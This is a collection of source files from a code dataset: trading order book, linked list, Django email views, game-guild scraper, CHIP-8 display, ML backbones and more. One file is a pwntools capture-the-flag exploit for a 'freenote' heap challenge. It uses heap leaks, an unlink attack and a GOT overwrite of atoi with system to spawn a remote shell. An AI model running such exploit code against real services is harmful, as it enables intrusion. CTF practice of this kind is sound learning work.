self._add_sorted_legend(self.dataset.tail(1))\n","sub_path":"chart/trend_chart.py","file_name":"trend_chart.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"32890583","text":"from _queue import Queue\r\nfrom _base import BookBase\r\nfrom marketsim import Side, registry, timeserie\r\n\r\nclass Bids(Queue):\r\n \"\"\" Queue of limit orders buy\r\n \"\"\"\r\n \r\n def __init__(self, *args):\r\n Queue.__init__(self, *args)\r\n \r\n @property\r\n def label(self):\r\n return self.book.label + \"_{Bids}\"\r\n\r\n side = Side.Buy\r\n\r\n\r\nclass Asks(Queue):\r\n \"\"\" Queue of limit orders buy\r\n \"\"\"\r\n \r\n def __init__(self, *args):\r\n Queue.__init__(self, *args)\r\n\r\n @property\r\n def label(self):\r\n return self.book.label + \"^{Asks}\"\r\n\r\n side = Side.Sell\r\n\r\nclass Local(BookBase):\r\n \"\"\" Order book for a single asset in a market.\r\n Maintains two order queues for orders of different sides\r\n \"\"\"\r\n def __init__(self, tickSize=1, _digitsToShow = None, label=\"\", timeseries = [],\r\n marketOrderFee = None, # optional function (order, book)-> price to calculate fee for a market order\r\n limitOrderFee = None,\r\n cancelOrderFee = None):\r\n \"\"\" Initializes empty order book with given tick size\r\n \"\"\"\r\n BookBase.__init__(self, \r\n Bids(tickSize, self), \r\n Asks(tickSize, self), \r\n label, timeseries)\r\n \r\n self._digitsToShow = _digitsToShow\r\n \r\n if self._digitsToShow is None:\r\n nDigits = 0\r\n d = 1.\r\n while tickSize * d < 1:\r\n nDigits += 1\r\n d *= 10\r\n self._digitsToShow = nDigits\r\n \r\n self._tickSize = tickSize\r\n self._marketOrderFee = marketOrderFee\r\n self._limitOrderFee = limitOrderFee\r\n self._cancelOrderFee = cancelOrderFee\r\n\r\n _properties = {'tickSize' : float, \r\n '_digitsToShow' : int }\r\n\r\n @property\r\n def tickSize(self):\r\n \"\"\" Returns the tick side\r\n \"\"\"\r\n return self._tickSize\r\n \r\n @tickSize.setter\r\n def tickSize(self, value):\r\n self._tickSize = value\r\n\r\n def cancelOrder(self, order):\r\n \"\"\" To be called when 'order' is cancelled\r\n \"\"\"\r\n if self._cancelOrderFee:\r\n order.charge(self._cancelOrderFee(order, self))\r\n \r\n self.queue(order.side).cancelOrder(order)\r\n\r\n def evaluateOrderPrice(self, side, volume):\r\n \"\"\" Evaluates price at which a market order of given 'side' \r\n and having given 'volume' would be executed \r\n \"\"\"\r\n return self._queues[side.opposite.id].evaluateOrderPrice(volume)\r\n \r\n def evaluateOrderPriceAsync(self, side, volume, callback):\r\n callback(self.evaluateOrderPrice(side, volume))\r\n\r\n def evaluateVolumesForBudget(self, side, budget, callback):\r\n res = list(self._queues[side.opposite.id].pvsForFixedBudget(budget))\r\n callback(res)\r\n \r\n \r\n def processLimitOrder(self, order):\r\n \"\"\" Processes 'order' as limit order:\r\n If it is not matched completely, it stays at the order queue\r\n \"\"\"\r\n assert order.owner is not None\r\n\r\n if self._limitOrderFee:\r\n order.charge(self._limitOrderFee(order, self))\r\n \r\n if not self._queues[order.side.opposite.id].matchWith(order):\r\n self._queues[order.side.id].push(order)\r\n\r\n def processMarketOrder(self, order):\r\n \"\"\" Processes 'order' as market order:\r\n Iff it is not matched completely, returns False\r\n \"\"\"\r\n assert order.owner is not None\r\n \r\n if self._marketOrderFee:\r\n order.charge(self._marketOrderFee(order, self))\r\n \r\n return self._queues[order.side.opposite.id].matchWith(order)\r\n","sub_path":"marketsim/orderbook/_local.py","file_name":"_local.py","file_ext":"py","file_size_in_byte":3744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"160758788","text":"'''\ndefines singly linked list\n'''\nclass Node :\n '''\n defines a single linked list's node\n '''\n def __init__(self,data=0):\n self.data=data #assign data\n self.next=None\n \n \n\n\nclass singleLL:\n\n # initialize the single linked list with 0 node\n def __init__( self, head=None ):\n self.head = head\n \n \n def insert( self, data, pos=-1 ):\n # create a new node\n new_node = Node(data)\n\n if not self.head:\n # first node creation\n self.head = new_node\n return self.head\n elif pos == 0:\n # insertion at beginning\n new_node.next = self.head\n self.head = new_node\n \n # if position is not defined, by default insert at last\n elif pos == -1:\n # last node insertion\n n = self.head\n while (n.next):\n n = n.next\n n.next = new_node\n new_node.next = None\n else:\n assert pos >= 0, \"Enter position to insert element more than or equal to 0\"\n # traverse to pos\n i=0\n n = self.head\n while ( i < pos-1 ):\n i+=1\n n = n.next \n # now insert the node \n new_node.next = n.next\n n.next = new_node\n return self.head\n\n def printLL (self):\n \n n = self.head\n while (n.next):\n print(\"{}\".format(n.data), end=' -> ')\n n = n.next\n\n print(\"{}\\n\".format(n.data))\n \n def delete(self,pos=-1):\n '''\n by default deletes the last element in the list\n '''\n if not self.head:\n print(\"Empty list!!\")\n return False\n # if delete the head node\n if pos==0:\n self.head = self.head.next\n return self.head\n elif pos == -1 :\n # delete last element\n n = self.head\n while(n.next.next):\n n=n.next\n n.next = None\n return True\n \n else:\n n = self.head\n i = 0\n while (i < pos-1):\n n=n.next\n i+=1\n tmp = n.next\n n.next = n.next.next\n tmp.next = None\n return True\n\n\n \n \nif __name__ == \"__main__\":\n # create empty single linked list\n sll = singleLL()\n \n # insert elements\n for i in range(2,33,2):\n sll.insert(i)\n \n # display all \n sll.printLL()\n \n # insertion check\n print( \"inserting 1 in the starting\")\n sll.insert(1,0)\n sll.printLL()\n\n print( \"inserting 3 at postion 2nd( 0 based indexing )\")\n sll.insert(3,2)\n sll.printLL()\n\n print( \"deleting head node\")\n sll.delete(0)\n sll.printLL()\n\n print( \"deleting last node\")\n sll.delete()\n sll.printLL()\n\n print( \"deleting 1st node\")\n sll.delete(1)\n sll.printLL()\n","sub_path":"singleLL.py","file_name":"singleLL.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"590244886","text":"from distutils.command.config import config\n\nfrom django.shortcuts import render_to_response\nfrom django.http import HttpResponseBadRequest, HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom about_us.models import Partners\nfrom advertising.models import TypeExamples, CategoryExamples\nfrom .util import union\nfrom about_us.models import BackgroundImages, IndexNumbers\nfrom django.core.mail import EmailMessage, BadHeaderError\nfrom triera.settings import RECEPIENT_EMAIL\nimport json\nfrom random import shuffle\nfrom advertising.models import Type\n\n\ndef index_view(request):\n examples = list(union(TypeExamples.objects.all(), CategoryExamples.objects.all()))\n shuffle(examples)\n types = Type.objects.all()\n return render_to_response('html/index.html', {\"examples\": examples[:6],\n \"partners\": Partners.objects.all(),\n \"background\": BackgroundImages.objects.filter(title=\"Главная\").first(),\n \"numbers\": IndexNumbers.objects.first(),\n \"first\": types[:4],\n \"second\": types[4:]\n })\n\n\ndef contacts_view(request):\n return render_to_response('html/contacts.html', {\"background\": BackgroundImages.objects.filter(title=\"Контакты\").first()})\n\n\n@csrf_exempt\ndef callback_form(request):\n if request.method == \"POST\":\n body_unicode = request.body.decode('utf-8')\n details = json.loads(body_unicode)\n message = \"Имя: \" + details.pop(\"name\") + \"\\n\"\n message += \"Тема: \" + details.pop(\"topic\") + \"\\n\"\n message += \"Удобное время: \" + details.pop(\"preferredTime\") + \"\\n\"\n message += \"Телефон: \" + details.pop(\"phone\") + \"\\n\"\n message += \"Email: \" + details.pop(\"email\") + \"\\n\"\n\n try:\n email = EmailMessage(\"Заказ на обратный звонок\", message, to=[RECEPIENT_EMAIL])\n email.send()\n except BadHeaderError:\n return HttpResponse('Invalid header found.', content_type='text/plain')\n except Exception as e:\n print(e)\n return HttpResponse('error', content_type='text/plain')\n return HttpResponse(\"success\", content_type='text/plain')\n else:\n return HttpResponse(\"error\", content_type='text/plain')\n\n\n@csrf_exempt\ndef send_form(request):\n if request.method == \"POST\":\n body_unicode = request.body.decode('utf-8')\n details = json.loads(body_unicode)\n message = \"Имя: \" + details.pop(\"name\") + \"\\n\"\n message += \"Компания: \" + details.pop(\"company\") + \"\\n\"\n message += \"Телефон: \" + details.pop(\"phone\") + \"\\n\"\n message += \"Email: \" + details.pop(\"email\") + \"\\n\\n\\n\"\n message += details.pop(\"body\") + \"\\n\"\n\n try:\n email = EmailMessage(\"Связаться с нами\", message, to=[RECEPIENT_EMAIL])\n email.send()\n except BadHeaderError:\n return HttpResponse('Invalid header found.')\n except Exception as e:\n return HttpResponse('error', content_type='text/plain')\n return HttpResponse(\"success\", content_type='text/plain')\n else:\n return HttpResponseBadRequest\n\n\ndef robots_view(request):\n return render_to_response(\"robots.txt\", content_type=\"text/plain\")\n","sub_path":"triera/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"107864256","text":"from time import strftime\nfrom json import dump, load\nfrom logging import root\nfrom os.path import join, exists\nfrom os import mkdir\nfrom datetime import datetime, timedelta\nfrom requests.api import get\nimport pytz\n\nfrom WOW import WOW_getGuildRoster\nfrom updateMeta import NumberToClassName, getColorForRunScore, getColorForScore, NumberToClassColor\nfrom RIO import RIO_GetCharData, RIO_GetCharRankings, RIO_GetRecentRuns\nfrom updatePage import AddScoreColors, AddTimeAndPercDiff\nfrom updateMeta import updateTimeFile\n\n\n\n\ndef UpdateGuildRoster(rosterfile):\n guildData = WOW_getGuildRoster()\n writeObj = {}\n\n for member in guildData:\n char = member['character']\n\n if char['level'] == 60:\n name = char['name']\n realm = char['realm']['slug']\n\n rio_data = RIO_GetCharRankings(name,realm)\n \n try: \n rio_link = rio_data['profile_url']\n rio_score = rio_data['mythic_plus_scores_by_season'][0]['scores']['all']\n rio_scoreColor = getColorForScore(rio_score)\n except:\n rio_link = None\n rio_score = 0\n rio_scoreColor = '#ffffff'\n\n writeObj[char['id']] = {\n 'name': name,\n 'realm': realm,\n 'faction': 'horde' if char['realm']['slug'] == 'illidan' else 'alliance',\n 'class': char['playable_class']['id'],\n 'className': NumberToClassName[char['playable_class']['id']],\n 'classColor': NumberToClassColor[char['playable_class']['id']],\n 'race': char['playable_race']['id'],\n 'rank': member['rank'],\n 'score': rio_score,\n 'scoreColor': rio_scoreColor,\n 'links': {\n 'rio': rio_link,\n 'armory': f'https://worldofwarcraft.com/en-us/character/us/{realm}/{name}',\n 'wcl': f'https://www.warcraftlogs.com/character/us/{realm}/{name}',\n 'rbot': f'https://www.raidbots.com/simbot/quick?region=us&realm={realm}&name={name}'\n }\n }\n \n with open(rosterfile,'w') as f:\n dump(writeObj, f, indent=2)\n root.info(\"updated guild roster\")\n \n\n\ndef UpdateGuildRuns(folder, roster, startDate, endDate):\n\n rosterData = getRosterData(roster)\n runData = getAllRuns(rosterData)\n runData = removeInvalid(runData, startDate, endDate)\n\n AddScoreColors(runData)\n AddTimeAndPercDiff(runData)\n\n runsFile = join(folder, 'runs.json')\n if exists(runsFile):\n with open(runsFile,'r') as f:\n oldRunData = load(f)\n else:\n oldRunData = {'data': {}}\n \n oldRunData['data'] = {**oldRunData['data'], **runData}\n\n with open(join(folder,'runs.json'),'w') as f:\n dump(oldRunData, f, indent=2)\n\n updateTimeFile(folder)\n return\n\n\ndef getRosterData(rosterFile):\n with open(rosterFile, 'r') as f:\n return load(f)\n\n\ndef getAllRuns(rosterData):\n\n retval = {}\n\n for id, member in rosterData.items():\n playerData = RIO_GetRecentRuns(member['name'], member['realm'])\n\n for runId, run in playerData.items():\n if runId in retval.keys():\n retval[runId]['members'].append(id)\n retval[runId]['count'] += 1\n else:\n retval[runId] = run\n retval[runId]['members'] = [id]\n retval[runId]['count'] = 1\n \n\n return retval\n\n\ndef removeInvalid(runs, start, end):\n\n retval = {}\n\n for runId, runData in runs.items():\n runDate = datetime.strptime(runData['dateCompleted'], \"%Y-%m-%dT%H:%M:%S.000Z\")\n startDate = datetime.utcfromtimestamp(start)\n endDate = datetime.utcfromtimestamp(end)\n\n if startDate < runDate and runDate < endDate and runData['count'] >= 2:\n retval[runId] = runData\n \n return retval\n \ndef suffix(d):\n return 'th' if 11<=d<=13 else {1:'st',2:'nd',3:'rd'}.get(d%10, 'th')\n\n\ndef PrepFolder(folder,start,end,weekNum):\n if not exists(folder):\n mkdir(folder)\n\n metaFile = join(folder,'meta.json')\n if exists(metaFile): return\n\n start = datetime.utcfromtimestamp(start) - timedelta(hours=5)\n end = datetime.utcfromtimestamp(end) - timedelta(hours=5)\n with open(metaFile, 'w') as f:\n dump({\n 'num': weekNum,\n #11 am, Tuesday August 17th\n 'start': start.strftime(f'%-I %P, %A %B %-d{suffix(start.day)}'),\n 'end': end.strftime(f'%-I %P, %A %B %-d{suffix(end.day)}'),\n },f, indent=2)\n\n\ndef updateGuildMeta(folder, weeknumber):\n with open(join(folder,'meta.json'),'w') as f:\n dump({\n 'weekNum' : weeknumber\n }, f)\n return","sub_path":"data/updateGuild.py","file_name":"updateGuild.py","file_ext":"py","file_size_in_byte":4314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"252756421","text":"u\"\"\"EXERCÍCIO061.\n\nCurso de Python===>Professor Gustavo Guanabara--->ModuloII.\n\nRefaça o DESAFIO051, lendo o primerio termo e a razão de uma PA, mostrando os 10 primeiros termos da progressão usando a estrutura while.\n\"\"\"\nprint('Gerador de PA')\nprint('-=' * 10)\nprimeiro = int(input('Digite o primeiro termo da PA: '))\nrazão = int(input('Digite a razão da PA: '))\ntermo = primeiro\ncount = 1\nwhile count <= 10:\n print('{} ¬'.format(termo), end='')\n termo += razão\n count += 1\nprint('FIM')\n","sub_path":"python3/CursoEmVideo/mundo2/desafio062.py","file_name":"desafio062.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"291391055","text":"# This is the class blueprint for a GPU Object. ---------------------|\nimport pygame\nfrom pygame import Rect\n\n\nclass GPU():\n\tdef __init__(self):\n\t\tself.black = 0,0,0\t\t\t\t\t\t\t\t\t# Define the color black.\n\t\tself.white = 255,255,255\t\t\t\t\t\t\t# Define the color white.\n\t\tself.colors = [self.black, self.white]\t\t\t\t# Colors listing.\n\t\t\n\t\tself.width = 64\t\t\t\t\t\t\t\t\t\t# Sets Max Screen Width.\n\t\tself.height = 32\t\t\t\t\t\t\t\t\t# Sets Max Screen Height.\n\t\tself.pixels = self.width * self.height\t\t\t\t# Calculate the total number of pixels (2,048‬ max).\n\t\tself.size = self.width * 10, self.height * 10\t\t# Scale Screen to larger size.\n\n\t\t# Initialize GPU Memory\n\t\tself.graphics_memory = [0x00] * self.pixels\t\t\t# The main graphics memory for the GPU (2,048k)\n\n\t\t# CPU Connection Variable\n\t\tself.cpu = 0\t\t\t\t\t\t\t\t\t\t# Connects the GPU to the CPU.\n\n\n\tdef screen(self):\n\t\t# Build Main Screen\n\t\tself.screen = pygame.display.set_mode(self.size)\t# Creates a blank window. Window is scaled according to self.size.\n\t\t\n\t\t# Display an initial blank screen.\n\t\tself.screen.fill((0,0,0))\t\t\t\t\t\t\t# Sets all pixels to black and starts the screen.\n\n\n\tdef draw_graphics(self):\n\t\t# Draw entire screen using data stored in GPU memory.\n\t\tfor scanline in range(self.height):\t\t\t\t\t# For each scanline that makes up the screen (32 in total)\n\t\t\tfor pixel_in_scanline in range(self.width):\t\t# Process each pixel in the current scanline.\n\t\t\t\tself.screen.fill( self.colors[self.graphics_memory[pixel_in_scanline + (scanline * self.width)]], Rect(pixel_in_scanline*10, scanline*10, 10, 10) )\n\t\t\t\t\n\t\tpygame.display.flip()\t\t\t\t\t\t\t\t# Update the screen with the new data.\n\t\tself.cpu.draw_flag = False\t\t\t\t\t\t\t# Disable the CPU draw flag.\n\n","sub_path":"chip8_gpu.py","file_name":"chip8_gpu.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"376491755","text":"\n\nfrom xai.brain.wordbase.nouns._texture import _TEXTURE\n\n#calss header\nclass _TEXTURES(_TEXTURE, ):\n\tdef __init__(self,): \n\t\t_TEXTURE.__init__(self)\n\t\tself.name = \"TEXTURES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"texture\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_textures.py","file_name":"_textures.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"604752094","text":"from setuptools import setup, find_packages\nimport os\n\nmoduleDirectory = os.path.dirname(os.path.realpath(__file__))\nexec(open(moduleDirectory + \"/bilbo/__version__.py\").read())\n\n\ndef readme():\n with open(moduleDirectory + '/README.rst') as f:\n return f.read()\n\n\nsetup(name=\"bilbo\",\n version=__version__,\n description=\"Commands to help build and maintain a gollum wiki\",\n long_description=readme(),\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 2.7',\n 'Topic :: Utilities',\n ],\n keywords=['tool, wiki'],\n url='https://github.com/thespacedoctor/bilbo',\n download_url='https://github.com/thespacedoctor/bilbo/archive/v%(__version__)s.zip' % locals(\n ),\n author='David Young',\n author_email='davidrobertyoung@gmail.com',\n license='MIT',\n packages=find_packages(),\n include_package_data=True,\n # package_data={'bilbo': [\n # 'resources/*/*', 'resources/*.*', 'resources/*/*/*', 'resources/*/*.*']},\n install_requires=[\n 'pyyaml',\n 'bilbo',\n 'frankenstein',\n 'fundamentals',\n 'titlecase'\n ],\n test_suite='nose2.collector.collector',\n tests_require=['nose2', 'cov-core'],\n entry_points={\n 'console_scripts': ['bilbo=bilbo.cl_utils:main'],\n },\n zip_safe=False)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"137769930","text":"from scrapy.spiders import Spider\nfrom news.items import NewsItem\nimport scrapy\nimport re\n\nclass NewsSpider(Spider):\n name = 'news'\n start_urls = ['http://money.163.com/special/002526O3/trade09.html']\n\n def parse(self, response):\n for i in range(2,21):\n url = response.url.replace('.html','') + '_'+'0' + str(i) + '.html'\n yield scrapy.Request(url,callback=self.parse_page2)\n def parse_page2(self,response):\n list = []\n elements = response.xpath(\"//div[@class = 'list_item clearfix']\")\n with open('formal.txt','a',encoding='utf8') as f:\n for element in elements:\n result = element.xpath(\"./div/h2/a/@href\").extract()[0]\n if result not in list:\n list.append(result)\n f.write(result)\n f.write('\\n')\n\n\n\n\n\n","sub_path":"news/spiders/news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"505902688","text":"# This imports the torchivsion defined backbones\n__all__ = [\"create_torchvision_backbone\"]\n\nfrom mantisshrimp.imports import *\n\n\ndef create_torchvision_backbone(backbone: str, pretrained: bool):\n \"\"\" Creates models from torchvision, uses imagenet pretrained_weights\n\n Args:\n backbone (str): The name of model\n pretrained (bool): If True uses Imagenet pretrained weights\n \n Returns:\n nn.Module: The model from torchvision\n \"\"\"\n\n # These creates models from torchvision directly, it uses imagent pretrained_weights\n if backbone == \"mobilenet\":\n mobile_net = torchvision.models.mobilenet_v2(pretrained=pretrained)\n ft_backbone = mobile_net.features\n ft_backbone.out_channels = 1280\n return ft_backbone\n\n elif backbone == \"vgg11\":\n vgg_net = torchvision.models.vgg11(pretrained=pretrained)\n ft_backbone = vgg_net.features\n ft_backbone.out_channels = 512\n return ft_backbone\n\n elif backbone == \"vgg13\":\n vgg_net = torchvision.models.vgg13(pretrained=pretrained)\n ft_backbone = vgg_net.features\n ft_backbone.out_channels = 512\n return ft_backbone\n\n elif backbone == \"vgg16\":\n vgg_net = torchvision.models.vgg16(pretrained=pretrained)\n ft_backbone = vgg_net.features\n ft_backbone.out_channels = 512\n return ft_backbone\n\n elif backbone == \"vgg19\":\n vgg_net = torchvision.models.vgg19(pretrained=pretrained)\n ft_backbone = vgg_net.features\n ft_backbone.out_channels = 512\n return ft_backbone\n\n elif backbone == \"resnet18\":\n resnet_net = torchvision.models.resnet18(pretrained=pretrained)\n modules = list(resnet_net.children())[:-1]\n ft_backbone = nn.Sequential(*modules)\n ft_backbone.out_channels = 512\n return ft_backbone\n\n elif backbone == \"resnet34\":\n resnet_net = torchvision.models.resnet34(pretrained=pretrained)\n modules = list(resnet_net.children())[:-1]\n ft_backbone = nn.Sequential(*modules)\n ft_backbone.out_channels = 512\n return ft_backbone\n\n elif backbone == \"resnet50\":\n resnet_net = torchvision.models.resnet50(pretrained=pretrained)\n modules = list(resnet_net.children())[:-1]\n ft_backbone = nn.Sequential(*modules)\n ft_backbone.out_channels = 2048\n return ft_backbone\n\n elif backbone == \"resnet101\":\n resnet_net = torchvision.models.resnet101(pretrained=pretrained)\n modules = list(resnet_net.children())[:-1]\n ft_backbone = nn.Sequential(*modules)\n ft_backbone.out_channels = 2048\n return ft_backbone\n\n elif backbone == \"resnet152\":\n resnet_net = torchvision.models.resnet152(pretrained=pretrained)\n modules = list(resnet_net.children())[:-1]\n ft_backbone = nn.Sequential(*modules)\n ft_backbone.out_channels = 2048\n return ft_backbone\n\n elif backbone == \"resnext101_32x8d\":\n resnet_net = torchvision.models.resnext101_32x8d(pretrained=pretrained)\n modules = list(resnet_net.children())[:-1]\n ft_backbone = nn.Sequential(*modules)\n ft_backbone.out_channels = 2048\n return ft_backbone\n\n else:\n raise ValueError(\"No such backbone implemented in mantisshrimp\")\n","sub_path":"mantisshrimp/backbones/torchvision_backbones.py","file_name":"torchvision_backbones.py","file_ext":"py","file_size_in_byte":3299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"389442247","text":"def table(k) :\n n = 1\n while n <= 11 :\n print(n*k,end=\" \")\n n=n+1\n\ntable(9)\nprint(\"\\n\")\n\ndef tableTrois(k) :\n n = 3\n while n <= 5 :\n print(n*k,end=\" \")\n n=n+1\n\ntableTrois(9)\nprint(\"\\n\")\n\ndef tableUn(k) :\n print(8*k,end=\" \")\n\ntableUn(9)\n","sub_path":"BTS-SIO/algorithme/1ère année/TP5-Fonctions/Fonctions/exercice3.py","file_name":"exercice3.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"439394693","text":"#shape of the matrices\n\nimport tensorflow as tf\nimport numpy as np \n\na=np.ones([7,1])\nb=np.ones([7])\n\nsa=tf.shape(a)\nsb=tf.shape(b)\n\nprint(a)\nprint(b)\nprint(sa, sb)","sub_path":"tf_shape0626.py","file_name":"tf_shape0626.py","file_ext":"py","file_size_in_byte":164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"26263432","text":"from PySide2.QtWidgets import QDialog, QDialogButtonBox, QVBoxLayout, QPlainTextEdit, QShortcut\nfrom PySide2.QtGui import QKeySequence\n\n\nclass EditVarVal_Dialog(QDialog):\n def __init__(self, parent, var):\n super(EditVarVal_Dialog, self).__init__(parent)\n\n # shortcut\n save_shortcut = QShortcut(QKeySequence.Save, self)\n save_shortcut.activated.connect(self.save_triggered)\n\n main_layout = QVBoxLayout()\n\n self.val_text_edit = QPlainTextEdit()\n var_val_str = ''\n try:\n var_val_str = str(var.val)\n except Exception as e:\n var_val_str = 'couldn\\'nt stringify value'\n self.val_text_edit.setPlainText(var_val_str)\n\n main_layout.addWidget(self.val_text_edit)\n\n button_box = QDialogButtonBox()\n button_box.setStandardButtons(QDialogButtonBox.Cancel | QDialogButtonBox.Ok)\n button_box.accepted.connect(self.accept)\n button_box.rejected.connect(self.reject)\n\n main_layout.addWidget(button_box)\n\n self.setLayout(main_layout)\n self.resize(450, 300)\n\n self.setWindowTitle('edit var val \\''+var.name+'\\'')\n\n def save_triggered(self):\n self.accept()\n\n\n def get_val(self):\n val = self.val_text_edit.toPlainText()\n try:\n val = eval(val)\n except Exception as e:\n pass\n return val","sub_path":"Ryven/custom_src/script_variables/EditVarVal_Dialog.py","file_name":"EditVarVal_Dialog.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"192733183","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n__author__ = 'Fu Yangzhen'\n\n\n# Created on 2016/10/12\n\nclass Solution:\n def fizzBuzz(self, n):\n results = []\n for i in range(1, n + 1):\n if i % 15 == 0:\n results.append(\"fizz buzz\")\n elif i % 5 == 0:\n results.append(\"buzz\")\n elif i % 3 == 0:\n results.append(\"fizz\")\n else:\n results.append(str(i))\n return results\n\n\nwhile True:\n try:\n n = input()\n print(Solution().fizzBuzz(int(n)))\n except EOFError:\n break\n","sub_path":"LintCode/FizzBuzz.py","file_name":"FizzBuzz.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"497391617","text":"from pwn import *\n\nr = remote('pwn2.jarvisoj.com',9886)\nelf = ELF('./freenote_x64')\nlibc = ELF('./libc-2.19.so')\n\ndef list():\n r.sendlineafter('choice: ', '1')\n\ndef new(payload):\n r.sendlineafter('choice: ', '2')\n r.sendlineafter('new note: ', str(len(payload)))\n r.sendafter('note: ', payload)\n\ndef edit(num,payload):\n r.sendlineafter('choice: ', '3')\n r.sendlineafter('number: ', str(num))\n r.sendlineafter('note: ', str(len(payload)))\n r.sendafter('your note: ', payload)\n\ndef delete(num):\n r.sendlineafter('choice: ', '4')\n r.sendlineafter('number: ', str(num))\n\n#leak heap base\nnew('a' * 0x80) #0\nnew('a' * 0x80) #1\nnew('a' * 0x80) #2\nnew('a' * 0x80) #3\nnew('a' * 0x80) #4\n#malloc chunk4 to avoid chunk3 consolidated to topchunk\n\ndelete(3)\ndelete(1)\nedit(0,'a' * 0x80 +'b' * 0x10)\n#overwrite next chunk'header to leak\n\nlist()\n\nr.recvuntil('b' * 0x10)\nheap_base = u64(r.recvuntil('\\x0a', drop=True).ljust(0x8,'\\x00')) - 0x19c0 # 0x1810 + 3 * 0x90\nchunk0 = heap_base + 0x20\nsuccess('leak heap base')\nsuccess('heapbase:' + hex(heap_base))\n\nsleep(1)\n\n#unlink\npayload = p64(0) + p64(0x80) + p64(chunk0 - 3 * 8) + p64(chunk0 - 2 * 8) + 'a' * (0x80 - 4 * 8) + p64(0x80) + p64(0x90)\npayload = payload.ljust(0x100,'\\xbb') # 0x80 * 2\nedit(0, payload)\n\ndelete(1)\nsuccess('unlink')\n\nsleep(1)\n\n#leak libc base\npayload2 = p64(2) + p64(1) + p64(0x80) + p64(chunk0) + p64(1) + p64(8) + p64(elf.got['atoi'])\npayload2 = payload2.ljust(0x100, '\\xbb')\nedit(0, payload2)\n\nlist()\n\nr.recvuntil('1. ')\nlibc_base = u64(r.recvuntil('\\x0a', drop=True).ljust(0x8, '\\x00')) - libc.sym['atoi']\nsuccess(hex(libc_base))\n\n#modify atoi to system to getshell\nsys_addr = libc_base + libc.sym['system']\n\nedit(1, p64(sys_addr)) # *(&atoi@got) = sys_addr\n\nr.sendlineafter('choice: ', '/bin/sh\\0')\n\nr.interactive()","sub_path":"JarvisOJ/XMAN/level6/level6_x64/level6_x64.py","file_name":"level6_x64.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"53544725","text":"\"\"\"\nCreated on Tue Dec 5 21:10:04 2018\n@author: Ismael Cesar\ne-mail: ismael.c.s.a@hotmail.com\n\n\"\"\"\nimport numpy as np\nimport torch\nfrom torch.utils.data.dataset import Dataset\n#from darts_for_wine.winesC20 import calload\n\n\n\nclass WinesDataset(Dataset):\n \"\"\"\n Class to be used by the data loader for getting the data.\n \"\"\"\n\n def __init__(self, data, labels, use_nparrays=False):\n # Transform the numpy arrays into float tensors\n \"\"\"\n :param data: Array with the data\n :param labels: An array with the corresponding labels\n :param use_nparrays: if set to false. the procedure will transform the nparrays into\n pytorch tensors\n \"\"\"\n self.data = []\n self.labels = []\n if use_nparrays == False:\n\n for d, l in zip(data, labels):\n self.data.append(d.reshape(1, d.shape[0], d.shape[1]).tolist())\n self.labels.append(l)\n\n self.data = torch.FloatTensor(self.data)\n self.labels = torch.LongTensor(self.labels)\n\n else:\n self.data = torch.from_numpy(data.reshape(data.shape[0], 1, data.shape[1], data.shape[2]))\n self.labels = torch.from_numpy(labels)\n\n def __getitem__(self, item):\n \"\"\"\n :param item:\n :return: A tuple with the tensor and its corresponding labels\n \"\"\"\n return (self.data[item],self.labels[item])\n\n def __len__(self):\n \"\"\"\n :return: returns the size of the dataset\n \"\"\"\n return self.data.shape[0]\n","sub_path":"cnn/darts_for_wine/winedataset.py","file_name":"winedataset.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"34402326","text":"# -*- coding: utf-8 -*-\n# © 2017 Pharmadus I.T.\n# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).\nfrom openerp import models, fields, api\nfrom datetime import date, timedelta\n\n\nclass BaseCalendar(models.Model):\n _name = 'base.calendar'\n _description = 'Calendar'\n _rec_name = 'year'\n _order = 'year desc'\n\n year = fields.Integer('Year')\n\n\nclass BaseCalendarDays(models.Model):\n _name = 'base.calendar.days'\n _rec_name = 'day'\n _order = 'day'\n\n day = fields.Date('Day', readonly=True)\n weekday = fields.Selection([(1, 